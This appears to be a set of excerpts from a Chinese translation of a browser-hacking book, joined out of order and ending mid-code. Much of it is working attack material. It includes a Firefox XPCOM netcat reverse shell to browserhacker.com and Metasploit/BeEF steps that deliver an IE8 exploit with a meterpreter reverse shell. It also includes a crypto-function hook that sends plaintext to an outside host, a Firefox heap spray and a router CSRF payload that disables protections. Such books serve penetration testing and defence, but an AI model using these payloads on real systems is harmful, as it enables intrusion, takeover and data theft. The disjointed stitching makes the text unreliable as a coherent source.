text
stringlengths
64
2.99M
8 Mozilla. (2013). nsIOutputStream . Retrieved November 30, 2013 from https://developer.mozilla.org/en-US/docs/XPCOM_Interface_Reference/nsIOutputStream 利用这个XPCOM API可以在攻击中完成更多任务。
比如,可以利用它部署Metasploit Meterpreter或其他远程访问工具等payload: function makeFile(bdata){ var workingDir= Components.classes[ "@mozilla.org/file/directory_service;1"] .getService(Components.interfaces.nsIProperties) .get("Home", Components.interfaces.nsIFile); var aFile = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); aFile.initWithPath( workingDir.path + "\\filename.exe" ); aFile.createUnique( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 777); var stream = Components.classes[ "@mozilla.org/network/safe-file-outputstream;1"] .createInstance(Components.interfaces.nsIFileOutputStream); stream.init(aFile, 0x04 | 0x08 | 0x20, 0777, 0); stream.write(bdata, bdata.length); if (stream instanceof Components.interfaces.nsISafeOutputStream){ stream.finish(); } else { stream.close(); } } 代码中的 makeFile() 方法使用XPCOM写入(Windows)文件系统。
以下代码演示了如何在Linux操作系统中,使用Netcat执行反向shell: var lFile = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); var lPath = "/bin/nc"; lFile.initWithPath(lPath); var process = Components.classes["@mozilla.org/process/util;1"] .createInstance(Componen ts.interfaces.nsIProcess); process.init(lFile); process.run(false,['-e', '/bin/bash', 'browserhacker.com', '12345'],4); 这个例子同时使用了nsILocalFile和nsIProcess来达到控制目标浏览器所在系统的目的。
9 Mozilla. (2013). Displaying web content in an extension without security issues .Retrieved November 30, 2013 from https://developer.mozilla.org/en-US/docs/Displaying_web_content_in_an_extension_without_security_issues 10 Adam Barth, Adrienne Porter Felt, Prateek Saxena, and Aaron Boodman.(2012). Protecting Browsers from Extension Vulnerabilities . Retrieved November 30, 2013 from http://www.cs.berkeley.edu/~afelt/secureex-tensions.pdf 7.1.5 理解Chrome扩展 与Firefox扩展类似,Chrome扩展运行时拥有的权限也很高。 Chrome扩展可以做到正常情况下网页中的JavaScript代码做不到的事。 比如,Chrome扩展可以访问所有打开的标签页、发送跨域请求、读取cookie(包括那些标记为HttpOnly的cookie),等等。 如图7-8所示,Chrome比Firefox的架构要复杂一些,除了包含有特权的chrome://区域,还有安全边界。 图 7-8 相关的Chrome扩展结构 每个Chrome扩展都包含一个 清单文件 (manifest file),以及由后台页面、UI页面及内容脚本构成的其他组件。
Chrome可以帮到你! 把扩展安装到Chrome浏览器,然后动态进行调试。 在chrome://extensions中切换到开发者模式,就可以运行解压缩到你选定的目录的扩展。 启用开发者模式后,可以通过Inspect Views选项打开Chrome Developer Tools窗口。 点击Extensions标签页中Inspect Views后面的文件。
下面的代码展示了一个示例manifest.json文件的内容: { "name": "extensionName", "version": "versionString", "manifest_version": 2 <rest of content> } 清单文件第1版的安全限制相对较少,因此也对攻击流行的Chrome扩展提供了很多机会 12 。
12 Nicholas Carlini, Adrienne Porter Felt, and David Wagner. (2012). An Evaluation of the Google Chrome Extension Security Architecture .Retrieved November 30, 2013 from http://www.eecs.berkeley.edu/~afelt/extensionvulnerabilities.pdf 为此,谷歌开发了清单文件第2版,采用了默认安全的策略。
13 W3C. (2012). Content Security Policy 1.0 . Retrieved November 30, 2013 from http://www.w3.org/TR/CSP/ 本书出版之际,Chrome不再支持使用清单文件第1版的扩展,只支持使用第2版的扩展。
虽然严格来讲内容脚本是扩展的一部分,但有时候把它想象成网页的一部分会更有帮助。 不过,这个部分非常特殊,它既不同于其他扩展脚本,也不同于运行在网页中的标准脚本。
14 Google. (2013). Content scripts . Retrieved November 30, 2013 from https://developer.chrome.com/extensions/content_scripts.html 然而,内容脚本又的的确确是扩展的组件,从它们稍微被提高的访问权限可以清楚地看到这一点。
它们可以对任何列在其清单文件中的来源,发起跨域XHR请求: "permissions": [ "http://*/*", "https://*/*" ] 前面清单文件中的JSON代码表明,内容脚本可以对任何HTTP和HTTPS源发送 XMLHttpRequest 请求。
每个扩展至多有一个后台页面,与打开多少窗口或标签页无关。 不过,隐身标签页另当别论,一般来说,所有打开的窗口和标签页是共享后台页面的。
15 Google. (2013). NPAPI . Retrieved November 30, 2013 from http://developer.chrome.com/extensions/npapi.html 16 Wikipedia. (2013). NPAPI . Retrieved November 30, 2013 from https://en.wikipedia.org/wiki/NPAPI NPAPI插件在Chrome沙箱外部运行,拥有用户权限。
17 Google. (2013). NPAPI warning . Retrieved November 30, 2013 from http://developer.chrome.com/extensions/npapi.html#warning NPAPI插件可能存在缓冲区溢出、格式字符串bug和命令注入等漏洞。
下面的例子展示了某些manifest.json的内容,这些内容表明目标扩展在使用插件: { "name": "BHH Extension", ... "plugins": [ {"path": "bhh_extension_plugin.dll" } ], ... } 如果你在目标扩展中看到前面的代码,那么就有必要探索相关插件可能存在的漏洞。
以下代码示例演示了基于http://browservictim.com/的匹配模式: "content_scripts": [ { "matches": ["http://browservictim.com/*"], "css": ["styles.css"], "js": ["script.js"] } ], 特别要注意匹配模式中包含通配符的扩展,比如 file:///* 、 http://*/* 、 *://*/* 或 <all_urls> 。
相应的权限同样也在manifest.json文件中列出,比如下面这个例子: "permissions": [ "http://*/*", "https://*/*", "tabs", "cookies" ], 这个扩展在安装的时候,用户会看到一个确认对话框,以人类可读的方式告诉用户扩展在请求什么权限 18 。 只要用户点击了Add安装扩展,那么对话框中列出的权限就相当于全部赋予了扩展,如图7-11所示。 18 Google. (2013). Permission warning . Retrieved November 30, 2013 from https://developer.chrome.com/extensions/permission_warnings.html 图 7-11 Quick Note扩展在安装时请求权限 Chrome Web Store中的很多扩展,在安装时都会请求“Access your data on all websites”(访问你在所有网站中的数据)这项权限。 同意安装这些扩展之后,它们就获得了访问你打开的所有网站的权限,包括使用HTTPS URI模式访问的网站。
下面就是一个在扩展后台页中运行,并与内容脚本通信的代码示例: 19 Google. (2013). Messaging security considerations . Retrieved November30, 2013 from http://developer.chrome.com/extensions/messaging.html#security-considerations chrome.tabs.sendMessage(tab.id, {greeting: "hello"}, function(response) { var resp = eval("(" + response.farewell + ")"); }); 前面的代码不安全地使用了 eval ,将内容脚本消息作为参数的一部分。 下面这个例子使用 innerHTML 将不受信任的响应写入DOM: chrome.tabs.sendMessage(tab.id, {greeting: "hello"}, function(response) { document.getElementById("resp").innerHTML = response.farewell; }); 注意, eval 和 innerHTML 都是审读目标扩展的代码时,需要重点关注的地方,尤其是在后台页面中使用的时候。
如果开发者在manifest.json文件中明确声明了,那么可以在网页中直接访问消息API: "externally_connectable": { "matches": ["http://browservictim.com/*"] } 在这行JSON代码中, externally_connectable 声明意味着源可以直接访问消息传递API。
20 Google. (2013). Content security policy . Retrieved November 30, 2013 from http://developer.chrome.com/extensions/contentSecurityPolicy.html 具体的CSP限制是通过manifest.json文件中的 content_security_policy 参数来定义的。
21 Microsoft. (2013). Browser Extensions . Retrieved November 30, 2013 from http://msdn.microsoft.com/en-us/library/aa753587(v=vs.85).aspx 微软把IE扩展归类为包含BHO(Browser Helper Objects,浏览器帮助对象)、工具条和ActiveX控件 22 。
22 Microsoft. (2013). Browser Extensions Overviews and Tutorials . Retrieved November 30, 2013 from http://msdn.microsoft.com/en-us/library/aa753616(v=vs.85).aspx 使用受控代码编写IE扩展,可以减少出现漏洞的机会。
23 Microsoft. (2013). About Browser Extensions . Retrieved November 30, 2013 from http://msdn.microsoft.com/en-us/library/aa753620(v=vs.85).aspx 与Chrome和Firefox的扩展不同,不可能解压缩IE扩展来窥探源代码。
这个框架提供了利用开发者需要的很多功能,包括随机化的工具配备,针对多个环境和系统的预加固的shell,VNC连接处理,以及利用可能需要执行的其他类型的payload。
无论什么使用场景,所有信息都能够唾手可得,让各个层面的用户都能理解利用的目的是什么,影响有多大,如何运作以及如何检测它,而且还为测试提供了一个可以重现的场所。
要搜索针对IE8的所有模块,可以输入 search IE8 ,如下所示: msf > search IE8 [!] Database not connected or cache not built, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 00:00:00 UTC great Adobe Flash Player AVM Verification Logic Array Indexing Code Execution exploit/windows/browser/ie_cgenericelement_uaf 2013-05-03 00:00:00 UTC good MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability <snipped for brevity> 要获得关于某个模块的更多信息,可以输入info exploit/windows/browser/ie_cgene-ricelement_uaf ,例如: msf> info exploit/windows/browser/ie_cgenericelement_uaf Name: MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability Module: exploit/windows/browser/ie_cgenericelement_uaf Version: 0 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Good <snipped for brevity> 虽然这里只给出了部分输出,但足以说明如何发现模块,以及获得模块相关的信息了。
接下来要做的就是在Metasploit中启动Web服务器,然后使用BeEF将浏览器定向到Metasploit的监听端口上。 在处理针对浏览器的利用时,Metasploit会启动一个Web服务器,接收浏览器请求的信息。 Metasploit的Web服务器,可能有多个端点或者URI路径可供使用。 这样,一个Metasploit实例就可以在同一个网络端口上服务多个利用,而无需为每个利用单独启动一个服务器。
为此,需要输入以下命令: set URIPATH /single set SRVPORT 80 show options show targets set payload windows/meterpreter/reverse_tcp show options 这样就设置了路径为 /single ,并让服务器监听80端口。
关于payload,也有很多选择,可以通过输入 show payloads 来查看。 其中比较常用的一个payload是meterpreter。 这个payload是一个用于渗透测试的定制化的shell,有很多功能可以辅助利用后攻击。
下面这个例子是直接连接到主机的,因此使用了反向shell: set payload windows/meterpreter/reverse_tcp show options ---SNIP--- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port 选择了meterpreter反向TCP shell之后,需要确定三个选项: EXITFUNC 、 LHOST 和 LPORT 。
而 LPORT 则是大多数主机都可以畅通无阻地访问到的一个端口,因此应该选择443(如果你不确定连接的层次),或者如果没有任何端口被封,也可以随机选择一个: msf exploit(ie_cgenericelement_uaf) > set LHOST browserhacker.com LHOST => 192.168.1.132 msf exploit(ie_cgenericelement_uaf) > set LPORT 443 LPORT => 443 msf exploit(ie_cgenericelement_uaf ) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.132:443 [*] Using URL: http://0.0.0.0:80/single [*] Local IP: http://192.168.1.132:80/single [*] Server started. 好了,现在服务器开始运行并等待连接了。
图 6-32 执行BeEF的Create Invisible IFrame模块 执行之后,稍等几秒,应该就可以在BeEF控制台中看到如下输出: [19:37:20][*] Hooked browser [id:1, ip:192.168.1.16] has been sent instructions from command module [id:4, name:'Create Invisible Iframe'] [19:37:25][*] Hooked browser [id:1, ip:192.168.1.16] has executed instructions from command module [id:4, name:'Create Invisible Iframe'] 在Metasploit控制台中,可以看到利用加载并发送到了Windows XP主机,最后打开了shell。 此时可以使用 sysinfo 命令收集关于目标电脑的更多信息: [*] 192.168.1.16 ie_cgenericelement_uaf - Requesting: /single [*] 192.168.1.16 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3 [*] 192.168.1.16 ie_cgenericelement_uaf - Sending HTML... [*] Sending stage (751104 bytes) to 192.168.1.16 [*] Meterpreter session 2 opened (192.168.1.132:3333 -> 192.168.1.16:1201) at 2013-06-08 19:42:51 -0400 meterpreter > sysinfo Computer : VM-1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 现在攻击目标系统上的shell已经掌握在你手里了,除非浏览器崩溃,否则网页应该会一直勾连到BeEF。
通过利用浏览器,你已经进入了目标系统,可以完成任何能够通过Metasploit完成的利用后的任务,包括逐步提升权限、攻击内部系统,或者在系统中安装永久性“后门”,以便该机器出现什么状况时,还能够在重启后再连接到你的机器。
其次要设置 LHOST 选项,也就是监听反向shell的监听主机: use auxiliary/server/browser_autopwn set LHOST 192.168.1.132 set SRVPORT 80 set URIPATH / exploit 这些Metasploit命令会选择Browser Autopwn辅助模块,设置 LHOST ,设置服务器端口以及URI。
Autopwn准备就绪时会显示以下消息: [*] --- Done, found 57 exploit modules [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.132:80/ [*] Server started. 由于Autopwn需要花很长时间,所以应该在利用过程中尽早启动,然后把它作为后备利用方案来用。
6.6.5 结合使用BeEF和Metasploit 结合使用BeEF和Metasploit,可以控制浏览器,采集浏览器指纹,以及在实际利用它之前取得尽可能多的信息。
要在BeEF中启用Metasploit,在BeEF主目录下编辑config.yaml文件,做如下修改将 metasploit 设置为 true : extension: requester: enable: true proxy: enable: true metasploit: enable: true social_engineering: true 在extensions/metasploit/config.yaml 配置文件中,可以找到其他配置值。
以下是可能的配置变量: beef: extension: metasploit: name: 'Metasploit' enable: true host: "127.0.0.1" port: 55552 user: "msf" pass: "abc123" uri: '/api' ssl: false ssl_version: 'SSLv3' ssl_verify: true callback_host: "127.0.0.1" autopwn_url: "autopwn" auto_msfrpcd: false auto_msfrpcd_timeout: 120 接下来,需要通过 msfconsole 来启动Metasploit。
要加载这个接口,在 msfconsole 中执行如下命令: msf > load msgrpc Pass=abc123 [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc 这里,只需要指定密码。
好了,假设MSGRPC已经加载,在命令行上启动BeEF,应该能在控制台中看到以下输出,表示Metasploit已经加载了: [ 0:20:32][*] Successful connection with Metasploit. [ 0:20:34][*] Loaded 237 Metasploit exploits. [ 0:20:34][*] BeEF is loading. Wait a few seconds... [ 0:20:35][*] 11 extensions enabled. [ 0:20:35][*] 410 modules enabled. 此时BeEF已经连接到了Metasploit服务器,BeEF有能力自己启动Metasploit命令。
Unknown 5.1 内容劫持 在当前被勾连的浏览器中替换页面内容,是一种最简单但常常被忽视的攻击方法,用此方法可以诱导用户访问经过特意构造的内容或触发特定的操作。
BeEF模块Get Page HTML就基于此实现: try { var html_head = document.head.innerHTML.toString(); } catch (e) { var html_head = "Error: document has no head"; } try { var html_body = document.body.innerHTML.toString(); } catch (e) { var html_body = "Error: document has no body"; } beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body); html_head 和 html_body 两个变量分别保存了文档的header和body的HTML代码。
BeEF模块中 net.send 的工作原理 我们曾在第3章中深入探讨了持续控制,但是BeEF在底层有许多有趣的代码,可以简化命令模块向框架传数据的流程。
这里的 beef.net.send() 方法就是个典型的例子。 为了能给命令模块提供一种可靠的方法,来将数据提交回BeEF服务器,BeEF在服务端提供了 beef.net.send() 方法以及与之相关的数据处理程序。 我们注意到,前面调用 beef.net.send() 方法时传了三个参数—— @common_url 、 @common_id 以及一个字符串值,在前面的例子中即: 'head='+html_head+'&body=' +html_body 。 BeEF会在命令模块被提交到用户浏览器前,对其进行一些处理:将 @command_url 替换为当前命令的URL,将 @command_id 替换为它的唯一ID。 当 beef.net.send() 发送回这些数据时,BeEF服务器能区分出数据源于哪个命令模块。
(1) beef.net.send() 将命令模块或其他BeEF库提供的任意数据添加到一个JavaScript数组中。 (2) BeEF的轮询器调用 beef.net.flush() 方法,该方法的功能如下: 将数组对象转化为JSON格式 1 ;
1 Mozilla. (2011). stringify- JavaScript | MDN . Retrieved November 15, 2013 from https://developer.mozilla.org/en-US/docs/JavaScript/Reference/Global_Objects/JSON/stringify 假设勾连的页面包含以下内容: <div id="header">This is the title of my page</div> <div id="content">This is where most of the content of my page rests. And this page has lots of interesting content</div> 你可以用下面的JavaScript代码,在不影响其他元素的前提下操作 header 元素: document.getElementById('header').innerHTML = "Evil Defaced Header"; 你也可以借助jQuery提供的强大的选择器来简化这些操作。
要使用BeEF提供的jQuery达到同样的功能,只需要执行以下代码: $j('#header').html('Evil Defaced Header'); BeEF包含了一个简单的模块,用来替换页面中的标准元素,包括HTML body、title以及图标。
这个模块提供了以下三个函数: document.body.innerHTML = "<%= @deface_content %>"; document.title = "<%= @deface_title %>"; beef.browser.changeFavicon("<%= @deface_favicon %>"); 第一个函数用来把 document.body 的HTML代码,替换成用户通过 @deface_content 变量提交的动态内容。
2 Mozilla. (2013). HTML script element . Retrieved November 15, 2013 from https://developer.mozilla.org/en/docs/Web/HTML/Element/script Ruby的Erubis库提供了动态绑定的功能,也就是在模块真正被发送回浏览器前,才把模块中的值替换为真实值。
最后一个函数则提供了替换页面图标的功能,主要逻辑由 BeEF 的 changeFavicon() 函数完成,其原理是通过修改 document.head 元素,来移除所有现存的页面图标元素,然后再添加一个新的,例如: <link id="dynamic-favicon" rel="shortcut icon" href="http://browserhacker.com/favicon.ico"> 如果这种简单粗暴的替换无法满足你的需求,你可以尝试使用Replace Component (Deface)模块。 比起前面那种只能整体替换 document.body 内容的方法,该模块提供了更细粒度的DOM元素选择和替换,示例如下(有些类似于之前使用jQuery重写指定元素的代码): var result = $j('<%= @deface_selector %>').each(function() { $j(this).html('<%= @deface_content %>'); }).length; beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced " + result +" elements"); 通过使用jQuery提供的选择器 3 ,我们只需使用一条命令,就能实现对一个DOM元素或一组DOM元素的替换。 前面的代码使用 @deface_selector 变量作为选择器,然后使用 @deface_content 变量依次循环替换元素的HTML代码。
3 The jQuery Foundation. (2013). Selectors | jQuery API Documentation . Retrieved November 15, 2013 from http://api.jquery.com/category/selectors/ 除了这些整体替换元素的模块,BeEF也提供了一些自动重写DOM元素内容的模块。
替换HREF :类似于Replace Component模块,这个模块循环替换所有 <a> 元素的HREF属性。 替换HREF(点击事件) :这个模块和上一个“替换HREF”模块几乎一样,唯一的区别是只在 onClick 时才触发修改,而且并不真正修改元素的 HREF 属性。
Unknown 4.4 小结 本章深入探讨了SOP,以及在攻击浏览器时绕过它的重要性。绕过SOP可以让被勾连的浏览器成为开放代理。不仅如此,而且能够读取不同来源的HTTP响应,这会让接下来几章将要介绍的攻击技术变得可能。 要可靠地绕过SOP,重要的是要全面理解SOP的各种变形。最简单地,SOP就是把拥有相同主机名、协议和端口的资源视为同源。如果其中任何属性有所不同,那么资源就不是同源。只有同源的资源之间才能无限制地交互。然而,SOP在不同环境和浏览器中有着不一致的实现。比如,DOM中的SOP和插件中的SOP往往行为不同。 掌握了SOP的功能之后,我们介绍了很多绕过SOP的技术,因攻击的情景而不同。具体来说,本章介绍的绕过SOP的技术涉及在Java、Adobe Reader、Adobe Flash、Silverlight、IE、Safari、Firefox、Opera,甚至云存储中实现攻击。 明白如何绕过SOP之后,你的工具也会更丰富。比如通过目标浏览器的代理请求、利用界面伪装攻击,甚至揭示用户浏览器的历史记录。绕过SOP之后,能够为攻击浏览器打开方便之门。 对浏览器开发者来说,在不同浏览器类型、版本和插件中实现一致的(以及更重要的)强制性的SOP,是一项巨大的挑战。而主流浏览器中日益增加的新HTML5特性,也进一步提高了克服挑战的难度。这也是在未来一段时间,无论对攻击还是防御而言,绕过SOP依然非常重要的原因所在。
从Firefox 23开始,禁用JavaScript的选项已经消失(但在about:config中的javascript. enabled标签里还可以设置) 27 。 现在使用Firefox(不带NoScript扩展)的普通用户只能允许JavaScript运行。 JavaScript与浏览器的界限越来越模糊了。 27 Mozilla. (2013). Bug 873709—Firefox v23—Disable JavaScript Check Box Removed from Options/Preferences Applet . Retrieved August 12, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=873709 因此,在讨论浏览器攻击技术时,很难不涉及JavaScript。
HTML5的时代到来以后,WebSocket协议以及其他现代浏览器技术的逐渐普及,让了解浏览器如何保护数据,以及它如何与后端服务器传输数据变得愈发重要。
28 Matasano Security. (Unknown Year). Javascript Cryptography Considered Harmful . Retrieved August 12, 2013 from http://www.matasano.com/articles/javascript-cryptography/ 1. 怀疑Web应用 开发出健壮的JavaScript加密技术面临着一些障碍,其中最主要的是浏览器与Web应用间信任关系的复杂性。
浏览器在某些情况下会完全信任Web应用,而在另一些情况下则只会部分信任它。 一方面,Web应用得不到浏览器的充分信任,因此不能在应用中保存敏感数据。 另一方面,浏览器对于加密的JavaScript代码又会隐式地信任。
比如,考虑如下JavaScript代码: var key = String.fromCharCode(75 % 80 * 2 * 6 / 12); 在这个例子中,可以看到密钥是一个数学函数,然后结果被转换成一个字符。
29 Vladimir Vorontsov. (2013). @ ONsec_Lab: How XSS can defeat your digital signatures . Retrieved July 20, 2013 from http://lab.onsec.ru/2013/04/how-xss-can-defeat-your-digital.html 3. 覆盖函数 如果信任假的签名还不够,那么大多数JavaScript对象的函数都可以被覆盖(有作用域的区别)。
下面来看一个例子,看看如何使用 斯坦福大学JavaScript加密库 (Stanford JavaScript Crypto Library,简称SJCL) 30 覆盖函数。 打开JavaScript控制台,使用以下代码加载这个库: 30 Emily Stark, Mike Hamburg, and Dan Boneh. (2009). Stanford Javascript Crypto Library . Retrieved August 12, 2013 from https://crypto.stanford.edu/sjcl/ var sjcl_lib = document.createElement('script'); sjcl_lib.src = "https://raw.github.com/bitwiseshiftleft/sjcl/master/sjcl.js"; document.getElementsByTagName('head')[0].appendChild(sjcl_lib); 把这个库加载到DOM中以后,使用以下代码来测试 encrypt 函数: sjcl.encrypt("password", "secret") 结果是一个包含密文( ct )及其他参数的数据结构,可用于加密过程。
下面的代码展示了不仅可以透明地覆盖 encrypt 函数,而且还可以取得密文: chained_encrypt = sjcl.encrypt sjcl.encrypt = function (password, plaintext, params, rp) { var img = document.createElement("img"); img.src = "http://browserhacker.com/?ch06secret=" + plaintext; document.head.appendChild(img); return chained_encrypt(password, plaintext, params, rp) } sjcl.encrypt("password", "secret") 以上代码连缀了 encrypt 函数,所以仍然会调用它。
与安全行业的很多部门一样,内存管理的防御领域也存在着“军备竞赛”,出现新的利用技术,就会出现新的安全机制,比如ASLR 31 、DEP 32 、SafeSEH 33 和堆cookie 34 。
31 PaX Team. (2003). Address space layout randomization . Retrieved August 12, 2013 from http://pax.grsecurity.net/docs/aslr.txt 32 Microsoft. (2009). Understanding DEP as a mitigation technology part 1 - Security esearch & Defense--Site Home--TechNet blogs . Retrieved August 12, 2013 from http://blogs.technet.com/b/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx 33 Microsoft. (Unknown Year). /SAFESEH (Image has Safe Exception Handlers) . Retrieved August 12, 2013 from http://msdn.microsoft.com/en-us/library/9a89h429(v=vs.80).aspx 34 Microsoft. (2009). Preventing the exploitation of user mode heap corruption vulnerabilities . Retrieved August 14, 2013 from http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx 你的目标是利用你能够掌控的功能去修改和组织内存结构,以便于你进一步入侵。
35 Alexander Sotirov. (Unknown Year). Heap Feng Shui in JavaScript . Retrieved August 12, 2013 from http://www.phreedom.org/research/heap-feng-shui/heap-feng-shui.html 2. Firefox与jemalloc 内存管理器或者内存分配器,负责管理分配到堆的虚拟内存。
36 Jason Evans. (2012). jemalloc . Retrieved August 12, 2013 from http://www.canonware.com/jemalloc/ Firefox使用jemalloc在它支持的平台上进行动态内存管理,这些平台包括Windows、Linux、OS X和安卓。
37 Wikipedia. (2013). Principle of locality - Wikipedia, the free encyclopedia . Retrieved August 12, 2013 from http://en.wikipedia.org/wiki/Principle_of_locality 在Firefox中,块会被进一步分为run(访问),负责最大2048字节的请求和分配需求。
图 6-27 jemalloc的架构 38 38 Patroklos Argyroudis and Chariton Karamitas. (2012). Exploiting the jemalloc Memory Allocator: Owning Firefox''s Heap . Retrieved August 12, 2013 from https://media.blackhat.com/bh-us-12/Briefings/Argyoudis/BH_12_Argyroudis_Exploiting_the_%20_jemalloc_Memory_%20Allocator_WP.pdf 3. 为利用重排Firefox内存 为了实现利用,关键在于把jemalloc内存重新排列为适合攻击的状态。
39 CVE. (2013). CVE-2013-0753 . Retrieved August 12, 2013 from http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0753 遗憾的是,调用这个函数的时候,人们大多不会做足够的检查,因此导致它出现漏洞。
实现这个初始堆喷射的JavaScript代码如下: /* 第一阶段要执行的大小和数量 * 这一阶段目标是`nsHTMLElement' * 的一个实例`mNextSibling'指向的类*/ BIG_SPRAY_SZ = 65534; BIG_SPRAY_NUM = 1 << 11; var buf = ""; var container_1 = []; // 使用`pad'在左侧填充`str' // 数量为`length' function lpad(str, pad, length){ while(str.length < length) str = pad + str; return str; } //小端字节序Unicode字符串用双倍字长 function get_dwle(dw){ wh = lpad(((dw >> 16) & 0xffff).toString(16), "0", 4); wl = lpad((dw & 0xffff).toString(16), "0", 4); escaped = "%u" + wl + "%u" + wh; return unescape(escaped); } /* 小端字节序Unicode字符串用四倍字长 *(由于精度限制,不能给函数传入64位整数, * 这里用双倍字长代替) */ function get_qwle(dwh, dwl){ return get_dwle(dwl) + get_dwle(dwh); } // `callq *0x5f8(%rax)'中`rax'的值 buf += get_qwle(0x117012000); //小端字节序Unicode字符串用四倍字长 // `testb $0x8, 0x2c(%r14)'要检查的标志 buf += unescape("%u8888%u8888%u8888%u8888"); buf += unescape("%u8888%u8888%u8888%u8888"); // `rip'的值, 应该在 `%rax + 0x5f8' buf += get_qwle(0x4142434445464748); buf = generate(buf, BIG_SPRAY_SZ); for(i = 0; i < BIG_SPRAY_NUM; i++) container_1[i] = buf.toLowerCase(); 如果这次堆喷射成功,内存地址0x117012000处内容的模式将类似图6-28所示。
图 6-28 内存中的结果内容 由于存在漏洞的原因,本次JavaScript利用中的硬编码地址最终会到达rax寄存器,而且由于该漏洞,目标进程会运行 call *0x5f8($rax) 。 因为rax寄存器中的值是攻击者通过JavaScript利用控制的,所以前面的指令将把Firefox的执行流引导到该值所表示的地址。
这样做的结果就是堆内存中受控制的堆区域间会出现128字节的缺口。 采用这个技术可以确保以后分配的128字节,极有可能恰好放到刚刚创建的这些堆缺口内。
以下JavaScript代码用于在序列化时修改DOM树,触发漏洞条件: var s = new XMLSerializer(); // 要创建的触发UAF的DOM子元素的数量 NUM_CHILDREN = 64; // 第二阶段允许执行的数量 // 本阶段目标是`HTMLElement'的实例 SMALL_SPRAY_NUM = 1 << 21; GC_TRIGGER_THRESHOLD = 100000; // 触发垃圾收集 function trigger_gc() { var gc = []; for(i = 0; i < GC_TRIGGER_THRESHOLD; i++){ gc[i] = new Array(); } return gc; } var stream = { write: function() { // 删除子元素并触发垃圾收集 // 会触发某些堆漏洞 for (i = 0; i < NUM_CHILDREN; i++) { parent.removeChild(children[i]) delete children[i]; children[i] = null; } trigger_gc(); // 取得上面创建的漏洞(`buf'仍然保存着必要数据) for (i = 0; i < SMALL_SPRAY_NUM; i += 2) container_2[i] = buf.toLowerCase(); } }; s.serializeToStream(parent, stream, "UTF-8"); 垃圾收集器会被调用,以释放相应的堆区域,而且一次小型堆喷射会发生,以重新分配之前由 HTMLUnknownElement 实例占据的内存区域。
40 Mozilla. (2013). 814001—(CVE-2013-0753) [FIX] XMLSerializer Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-1608) . Retrieved August 12, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=814001 虽然这里举的例子并没有自己执行代码,但以此为基础可以通过很多手段去设置64位指令指针或RIP值,指向内存中任意位置的代码,从而实现代码执行。
10 P. Watkins. (2001). Cross-site Request Forgeries . Retrieved June 15, 2013 from http://www.tux.org/~peterw/csrf.txt 9.5.1 理解跨站点请求伪造 XSRF攻击利用了Web应用对其用户的HTTP请求的信任。
因而攻击者可以在另一个源中,以用户身份执行以下代码: beef.execute(function() { var gateway = 'http://192.168.100.2/'; var passwd = 'new_password'; // 对每个IP启动远程管理并修改管理员密码 var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm \ (gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Management'}, {'type':'hidden', 'name':'change_action', 'value':''}, {'type':'hidden', 'name':'action', 'value':'Apply'}, {'type':'hidden', 'name':'PasswdModify', 'value':'0'}, {'type':'hidden', 'name':'http_enable', 'value':'1'}, {'type':'hidden', 'name':'https_enable', 'value':'1'}, {'type':'hidden', 'name':'ctm404_enable', 'value':''}, {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, {'type':'hidden', 'name':'wait_time', 'value':'4'}, {'type':'hidden', 'name':'need_reboot', 'value':'0'}, {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm','value':passwd}, {'type':'hidden', 'name':'_http_enable', 'value':'1'}, {'type':'hidden', 'name':'_https_enable', 'value':'1'}, {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, {'type':'hidden', 'name':'remote_management', 'value':'1'}, {'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'}, {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, {'type':'hidden', 'name':'http_wanport', 'value':'8080'}, {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, {'type':'hidden', 'name':'ctf_disable', 'value':'0'}, {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, {'type':'hidden', 'name':'upnp_config', 'value':'0'}, {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, ]); // 禁用防火墙和Java/ActiveX检测 var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm \ (gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, {'type':'hidden', 'name':'change_action', 'value':''}, {'type':'hidden', 'name':'action', 'value':'Apply'}, {'type':'hidden', 'name':'block_wan', 'value':'0'}, {'type':'hidden', 'name':'block_loopback', 'value':'0'}, {'type':'hidden', 'name':'multicast_pass', 'value':'1'}, {'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'}, {'type':'hidden', 'name':'ident_pass', 